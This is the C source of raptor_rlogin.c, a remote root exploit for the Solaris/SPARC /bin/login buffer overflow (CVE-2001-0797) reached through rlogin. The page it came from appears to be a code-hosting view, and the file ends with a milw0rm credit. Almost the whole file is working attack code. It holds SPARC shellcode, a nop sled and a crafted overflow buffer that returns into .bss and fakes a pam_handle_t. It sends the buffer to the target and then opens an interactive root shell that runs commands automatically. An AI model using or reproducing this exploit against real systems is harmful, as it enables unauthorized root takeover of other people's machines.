539 lines
No EOL
12 KiB
C
539 lines
No EOL
12 KiB
C
/*
|
|
* $Id: raptor_rlogin.c,v 1.1 2004/12/04 14:44:38 raptor Exp $
|
|
*
|
|
* raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8
|
|
* Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>
|
|
*
|
|
* Buffer overflow in login in various System V based operating systems
|
|
* allows remote attackers to execute arbitrary commands via a large number
|
|
* of arguments through services such as telnet and rlogin (CVE-2001-0797).
|
|
*
|
|
* Dedicated to my beautiful croatian ladies (hello Zrinka!) -- August 2004
|
|
*
|
|
* This remote root exploit uses the (old) System V based /bin/login
|
|
* vulnerability via the rlogin attack vector, returning into the .bss
|
|
* section to effectively bypass the non-executable stack protection
|
|
* (noexec_user_stack=1 in /etc/system).
|
|
*
|
|
* Many thanks to scut <scut@nb.in-berlin.de> (0dd) for his elite pam_handle_t
|
|
* technique (see 7350logout.c), also thanks to inode <inode@deadlocks.info>.
|
|
*
|
|
* Usage (must be root):
|
|
* # gcc raptor_rlogin.c -o raptor_rlogin -Wall
|
|
* [on solaris: gcc raptor_rlogin.c -o raptor_rlogin -Wall -lxnet]
|
|
* # ./raptor_rlogin -h 192.168.0.50
|
|
* [...]
|
|
* # id;uname -a;uptime;
|
|
* uid=0(root) gid=0(root)
|
|
* SunOS merlino 5.8 Generic_108528-13 sun4u sparc SUNW,Ultra-5_10
|
|
* 7:45pm up 12 day(s), 18:42, 1 user, load average: 0.00, 0.00, 0.01
|
|
* #
|
|
*
|
|
* Vulnerable platforms (SPARC):
|
|
* Solaris 2.5.1 without patch 106160-02 [untested]
|
|
* Solaris 2.6 without patch 105665-04 [untested]
|
|
* Solaris 7 without patch 112300-01 [untested]
|
|
* Solaris 8 without patch 111085-02 [tested]
|
|
*/
|
|
|
|
#include <errno.h>
|
|
#include <fcntl.h>
|
|
#include <netdb.h>
|
|
#include <signal.h>
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <strings.h>
|
|
#include <unistd.h>
|
|
#include <sys/time.h>
|
|
#include <sys/types.h>
|
|
#include <sys/socket.h>
|
|
#include <netinet/in.h>
|
|
#include <arpa/inet.h>
|
|
|
|
#define INFO1 "raptor_rlogin.c - (r)login, Solaris/SPARC 2.5.1/2.6/7/8"
|
|
#define INFO2 "Copyright (c) 2004 Marco Ivaldi <raptor@0xdeadbeef.info>"
|
|
|
|
#define BUFSIZE 3000 // max size of the evil buffer
|
|
#define RETADDR 0x27184 // retaddr, should be reliable
|
|
#define TIMEOUT 10 // net_read() default timeout
|
|
#define CMD "id;uname -a;uptime;\n" // executed upon exploitation
|
|
|
|
char sc[] = /* Solaris/SPARC special shellcode (courtesy of inode) */
|
|
/* execve() + exit() */
|
|
"\x94\x10\x20\x00\x21\x0b\xd8\x9a\xa0\x14\x21\x6e\x23\x0b\xcb\xdc"
|
|
"\xa2\x14\x63\x68\xd4\x23\xbf\xfc\xe2\x23\xbf\xf8\xe0\x23\xbf\xf4"
|
|
"\x90\x23\xa0\x0c\xd4\x23\xbf\xf0\xd0\x23\xbf\xec\x92\x23\xa0\x14"
|
|
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x82\x10\x20\x01\x91\xd0\x20\x08";
|
|
|
|
char sparc_nop[] = /* Solaris/SPARC special nop (xor %sp, %sp, %o0) */
|
|
"\x90\x1b\x80\x0e";
|
|
|
|
/* prototypes */
|
|
int exploit_addchar(unsigned char *ww, unsigned char wc);
|
|
void fatalerr(char *func, char *error, int fd);
|
|
int net_connect(char *host, int port, int timeout);
|
|
int net_read(int fd, char *buf, int size, int timeout);
|
|
int net_resolve(char *host);
|
|
int sc_copy(unsigned char *buf, char *str, long len);
|
|
void set_val(char *buf, int pos, int val);
|
|
void shell(int fd);
|
|
void usage(char *progname);
|
|
|
|
/*
|
|
* main()
|
|
*/
|
|
int main(int argc, char **argv)
|
|
{
|
|
char buf[BUFSIZE], *p = buf;
|
|
char c, *host = NULL, term[] = "vt100/9600";
|
|
int fd, i, found, len;
|
|
int timeout = TIMEOUT, debug = 0;
|
|
|
|
/* print exploit information */
|
|
fprintf(stderr, "%s\n%s\n\n", INFO1, INFO2);
|
|
|
|
/* parse command line */
|
|
if (argc < 2)
|
|
usage(argv[0]);
|
|
|
|
while ((c = getopt(argc, argv, "dh:t:")) != EOF)
|
|
switch(c) {
|
|
case 'h':
|
|
host = optarg;
|
|
break;
|
|
case 't':
|
|
timeout = atoi(optarg);
|
|
break;
|
|
case 'd':
|
|
debug = 1;
|
|
break;
|
|
default:
|
|
usage(argv[0]);
|
|
}
|
|
|
|
if (!host)
|
|
usage(argv[0]);
|
|
|
|
/* connect to the target host */
|
|
fd = net_connect(host, 513, 10);
|
|
fprintf(stderr, "# connected to remote host: %s\n", host);
|
|
|
|
/* signal handling */
|
|
signal(SIGPIPE, SIG_IGN);
|
|
|
|
/* begin the rlogin session */
|
|
memset(buf, 0, sizeof(buf));
|
|
|
|
if (send(fd, buf, 1, 0) < 0)
|
|
fatalerr("send", strerror(errno), fd);
|
|
|
|
if (net_read(fd, buf, sizeof(buf), timeout) < 0)
|
|
fatalerr("error", "Timeout reached in rlogin session", fd);
|
|
|
|
/* dummy rlogin authentication */
|
|
memcpy(p, "foo", 3); // local login name
|
|
p += 4;
|
|
memcpy(p, "bar", 3); // remote login name
|
|
p += 4;
|
|
memcpy(p, term, sizeof(term)); // terminal type
|
|
p += sizeof(term);
|
|
|
|
fprintf(stderr, "# performing dummy rlogin authentication\n");
|
|
if (send(fd, buf, p - buf, 0) < 0)
|
|
fatalerr("send", strerror(errno), fd);
|
|
|
|
/* wait for password prompt */
|
|
found = 0;
|
|
memset(buf, 0, sizeof(buf));
|
|
|
|
while (net_read(fd, buf, sizeof(buf), timeout)) {
|
|
if (strstr(buf, "assword: ") != NULL) {
|
|
found = 1;
|
|
break;
|
|
}
|
|
memset(buf, 0, sizeof(buf));
|
|
}
|
|
|
|
if (!found)
|
|
fatalerr("error", "Timeout waiting for password prompt", fd);
|
|
|
|
/* send a dummy password */
|
|
if (send(fd, "pass\n", 5, 0) < 0)
|
|
fatalerr("send", strerror(errno), fd);
|
|
|
|
/* wait for login prompt */
|
|
found = 0;
|
|
memset(buf, 0, sizeof(buf));
|
|
|
|
fprintf(stderr, "# waiting for login prompt\n");
|
|
while (net_read(fd, buf, sizeof(buf), timeout)) {
|
|
if (strstr(buf, "ogin: ") != NULL) {
|
|
found = 1;
|
|
break;
|
|
}
|
|
memset(buf, 0, sizeof(buf));
|
|
}
|
|
|
|
if (!found)
|
|
fatalerr("error", "Timeout waiting for login prompt", fd);
|
|
|
|
fprintf(stderr, "# returning into 0x%08x\n", RETADDR);
|
|
|
|
/* for debugging purposes */
|
|
if (debug) {
|
|
printf("# debug: press enter to continue");
|
|
scanf("%c", &c);
|
|
}
|
|
|
|
/* prepare the evil buffer */
|
|
memset(buf, 0, sizeof(buf));
|
|
p = buf;
|
|
|
|
/* login name */
|
|
memcpy(p, "foo ", 4);
|
|
p += 4;
|
|
|
|
/* return address (env) */
|
|
set_val(p, 0, RETADDR);
|
|
p += 4;
|
|
memcpy(p, " ", 1);
|
|
p++;
|
|
|
|
/* trigger the overflow (env) */
|
|
for (i = 0; i < 60; i++, p += 2)
|
|
memcpy(p, "a ", 2);
|
|
|
|
/* padding */
|
|
memcpy(p, " BBB", 4);
|
|
p += 4;
|
|
|
|
/* nop sled and shellcode */
|
|
for (i = 0; i < 398; i++, p += 4)
|
|
memcpy(p, sparc_nop, 4);
|
|
p += sc_copy(p, sc, sizeof(sc) - 1);
|
|
|
|
/* padding */
|
|
memcpy(p, "BBB ", 4);
|
|
p += 4;
|
|
|
|
/* pam_handle_t: minimal header */
|
|
memcpy(p, "CCCCCCCCCCCCCCCC", 16);
|
|
p += 16;
|
|
set_val(p, 0, RETADDR); // must be a valid address
|
|
p += 4;
|
|
set_val(p, 0, 0x01);
|
|
p += 4;
|
|
|
|
/* pam_handle_t: NULL padding */
|
|
for (i = 0; i < 52; i++, p += 4)
|
|
set_val(p, 0, 0x00);
|
|
|
|
/* pam_handle_t: pameptr must be the 65th ptr */
|
|
memcpy(p, "\x00\x00\x00 AAAA\n", 9);
|
|
p += 9;
|
|
|
|
/* send the evil buffer, 256 chars a time */
|
|
len = p - buf;
|
|
p = buf;
|
|
while (len > 0) {
|
|
fprintf(stderr, "#");
|
|
i = len > 0x100 ? 0x100 : len;
|
|
send(fd, p, i, 0);
|
|
len -= i;
|
|
p += i;
|
|
if (len)
|
|
send(fd, "\x04", 1, 0);
|
|
usleep(500000);
|
|
}
|
|
fprintf(stderr, "\n");
|
|
|
|
/* wait for password prompt */
|
|
found = 0;
|
|
memset(buf, 0, sizeof(buf));
|
|
|
|
fprintf(stderr, "# evil buffer sent, waiting for password prompt\n");
|
|
while (net_read(fd, buf, sizeof(buf), timeout)) {
|
|
if (strstr(buf, "assword: ") != NULL) {
|
|
found = 1;
|
|
break;
|
|
}
|
|
memset(buf, 0, sizeof(buf));
|
|
}
|
|
|
|
if (!found)
|
|
fatalerr("error", "Most likely not vulnerable", fd);
|
|
|
|
fprintf(stderr, "# password prompt received, waiting for shell\n");
|
|
|
|
if (send(fd, "pass\n", 5, 0) < 0)
|
|
fatalerr("send", strerror(errno), fd);
|
|
|
|
/* wait for shell prompt */
|
|
memset(buf, 0, sizeof(buf));
|
|
found = 0;
|
|
|
|
while (net_read(fd, buf, sizeof(buf), timeout)) {
|
|
if (strstr(buf, "# ") != NULL) {
|
|
found = 1;
|
|
break;
|
|
}
|
|
memset(buf, 0, sizeof(buf));
|
|
}
|
|
|
|
if (!found)
|
|
fatalerr("error", "Most likely not vulnerable", fd);
|
|
|
|
/* connect to the remote shell */
|
|
fprintf(stderr, "# shell prompt detected, successful exploitation\n\n");
|
|
shell(fd);
|
|
|
|
exit(0);
|
|
}
|
|
|
|
/*
|
|
* exploit_addchar(): char translation for pam (ripped from scut)
|
|
*/
|
|
int exploit_addchar(unsigned char *ww, unsigned char wc)
|
|
{
|
|
unsigned char * wwo = ww;
|
|
|
|
switch (wc) {
|
|
case ('\\'):
|
|
*ww++ = '\\';
|
|
*ww++ = '\\';
|
|
break;
|
|
case (0xff):
|
|
case ('\n'):
|
|
case (' '):
|
|
case ('\t'):
|
|
*ww++ = '\\';
|
|
*ww++ = ((wc & 0300) >> 6) + '0';
|
|
*ww++ = ((wc & 0070) >> 3) + '0';
|
|
*ww++ = (wc & 0007) + '0';
|
|
break;
|
|
default:
|
|
*ww++ = wc;
|
|
break;
|
|
}
|
|
|
|
return (ww - wwo);
|
|
}
|
|
|
|
/*
|
|
* fatalerr(): error handling routine
|
|
*/
|
|
void fatalerr(char *func, char *error, int fd)
|
|
{
|
|
fprintf(stderr, "%s: %s\n", func, error);
|
|
close(fd);
|
|
exit(1);
|
|
}
|
|
|
|
/*
|
|
* net_connect(): simple network connect with timeout
|
|
*/
|
|
int net_connect(char *host, int port, int timeout)
|
|
{
|
|
int fd, i, flags, sock_len;
|
|
struct sockaddr_in sin;
|
|
struct timeval tv;
|
|
fd_set fds;
|
|
|
|
/* allocate a socket */
|
|
if ((fd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
|
|
perror("socket");
|
|
exit(1);
|
|
}
|
|
|
|
/* bind a privileged port (FIXME) */
|
|
sin.sin_family = AF_INET;
|
|
sin.sin_addr.s_addr = htonl(INADDR_ANY);
|
|
for (i = 1023; i > 0; i--) {
|
|
sin.sin_port = htons(i);
|
|
if (!(bind(fd, (struct sockaddr *)&sin, sizeof(sin))))
|
|
break;
|
|
}
|
|
if (i == 0)
|
|
fatalerr("error", "Can't bind a privileged port (must be root)", fd);
|
|
|
|
/* resolve the peer address */
|
|
sin.sin_port = htons(port);
|
|
if (!(sin.sin_addr.s_addr = net_resolve(host)))
|
|
fatalerr("error", "Can't resolve hostname", fd);
|
|
|
|
/* set non-blocking */
|
|
if ((flags = fcntl(fd, F_GETFL, 0)) < 0)
|
|
fatalerr("fcntl", strerror(errno), fd);
|
|
if (fcntl(fd, F_SETFL, flags | O_NONBLOCK) < 0)
|
|
fatalerr("fcntl", strerror(errno), fd);
|
|
|
|
/* connect to remote host */
|
|
if (!(connect(fd, (struct sockaddr *)&sin, sizeof(sin)))) {
|
|
if (fcntl(fd, F_SETFL, flags) < 0)
|
|
fatalerr("fcntl", strerror(errno), fd);
|
|
return(fd);
|
|
}
|
|
if (errno != EINPROGRESS)
|
|
fatalerr("error", "Can't connect to remote host", fd);
|
|
|
|
/* set timeout */
|
|
tv.tv_sec = timeout;
|
|
tv.tv_usec = 0;
|
|
|
|
/* setup select structs */
|
|
FD_ZERO(&fds);
|
|
FD_SET(fd, &fds);
|
|
|
|
/* select */
|
|
if (select(FD_SETSIZE, NULL, &fds, NULL, &tv) <= 0)
|
|
fatalerr("error", "Can't connect to remote host", fd);
|
|
|
|
/* check if connected */
|
|
sock_len = sizeof(sin);
|
|
if (getpeername(fd, (struct sockaddr *)&sin, &sock_len) < 0)
|
|
fatalerr("error", "Can't connect to remote host", fd);
|
|
if (fcntl(fd, F_SETFL, flags) < 0)
|
|
fatalerr("fcntl", strerror(errno), fd);
|
|
return(fd);
|
|
}
|
|
|
|
/*
|
|
* net_read(): non-blocking read from fd
|
|
*/
|
|
int net_read(int fd, char *buf, int size, int timeout)
|
|
{
|
|
fd_set fds;
|
|
struct timeval wait;
|
|
int n = -1;
|
|
|
|
/* set timeout */
|
|
wait.tv_sec = timeout;
|
|
wait.tv_usec = 0;
|
|
|
|
memset(buf, 0, size);
|
|
|
|
FD_ZERO(&fds);
|
|
FD_SET(fd, &fds);
|
|
|
|
/* select with timeout */
|
|
if (select(FD_SETSIZE, &fds, NULL, NULL, &wait) < 0) {
|
|
perror("select");
|
|
exit(1);
|
|
}
|
|
|
|
/* read data if any */
|
|
if (FD_ISSET(fd, &fds))
|
|
n = read(fd, buf, size);
|
|
|
|
return n;
|
|
}
|
|
|
|
/*
|
|
* net_resolve(): simple network resolver
|
|
*/
|
|
int net_resolve(char *host)
|
|
{
|
|
struct in_addr addr;
|
|
struct hostent *he;
|
|
|
|
memset(&addr, 0, sizeof(addr));
|
|
|
|
if ((addr.s_addr = inet_addr(host)) == -1) {
|
|
if (!(he = (struct hostent *)gethostbyname(host)))
|
|
return(0);
|
|
memcpy((char *)&addr.s_addr, he->h_addr, he->h_length);
|
|
}
|
|
return(addr.s_addr);
|
|
}
|
|
|
|
/*
|
|
* sc_copy(): copy the shellcode, using exploit_addchar()
|
|
*/
|
|
int sc_copy(unsigned char *buf, char *str, long len)
|
|
{
|
|
unsigned char *or = buf;
|
|
int i;
|
|
|
|
for(i = 0; i < len; i++)
|
|
buf += exploit_addchar(buf, str[i]);
|
|
|
|
return(buf - or);
|
|
}
|
|
|
|
/*
|
|
* set_val(): copy a dword inside a buffer
|
|
*/
|
|
void set_val(char *buf, int pos, int val)
|
|
{
|
|
buf[pos] = (val & 0xff000000) >> 24;
|
|
buf[pos + 1] = (val & 0x00ff0000) >> 16;
|
|
buf[pos + 2] = (val & 0x0000ff00) >> 8;
|
|
buf[pos + 3] = (val & 0x000000ff);
|
|
}
|
|
|
|
/*
|
|
* shell(): semi-interactive shell hack
|
|
*/
|
|
void shell(int fd)
|
|
{
|
|
fd_set fds;
|
|
char tmp[128];
|
|
int n;
|
|
|
|
/* quote Hvar 2004 */
|
|
fprintf(stderr, "\"Da Bog da ti se mamica nahitavala s vragom po dvoristu!\" -- Bozica (Hrvatska)\n\n");
|
|
|
|
/* execute auto commands */
|
|
write(1, "# ", 2);
|
|
write(fd, CMD, strlen(CMD));
|
|
|
|
/* semi-interactive shell */
|
|
for (;;) {
|
|
FD_ZERO(&fds);
|
|
FD_SET(fd, &fds);
|
|
FD_SET(0, &fds);
|
|
|
|
if (select(FD_SETSIZE, &fds, NULL, NULL, NULL) < 0) {
|
|
perror("select");
|
|
break;
|
|
}
|
|
|
|
/* read from fd and write to stdout */
|
|
if (FD_ISSET(fd, &fds)) {
|
|
if ((n = read(fd, tmp, sizeof(tmp))) < 0) {
|
|
fprintf(stderr, "Goodbye...\n");
|
|
break;
|
|
}
|
|
if (write(1, tmp, n) < 0) {
|
|
perror("write");
|
|
break;
|
|
}
|
|
}
|
|
|
|
/* read from stdin and write to fd */
|
|
if (FD_ISSET(0, &fds)) {
|
|
if ((n = read(0, tmp, sizeof(tmp))) < 0) {
|
|
perror("read");
|
|
break;
|
|
}
|
|
if (write(fd, tmp, n) < 0) {
|
|
perror("write");
|
|
break;
|
|
}
|
|
}
|
|
}
|
|
|
|
close(fd);
|
|
exit(1);
|
|
}
|
|
|
|
void usage(char *progname)
|
|
{
|
|
fprintf(stderr, "usage: %s [-h host] [-t timeout] [-d]\n\n", progname);
|
|
fprintf(stderr, "-h host\t\tdestination ip or fqdn\n");
|
|
fprintf(stderr, "-t timeout\tnet_read() timeout (default: %d)\n", TIMEOUT);
|
|
fprintf(stderr, "-d\t\tturn on debug mode\n\n");
|
|
exit(1);
|
|
}
|
|
|
|
// milw0rm.com [2004-12-24]
|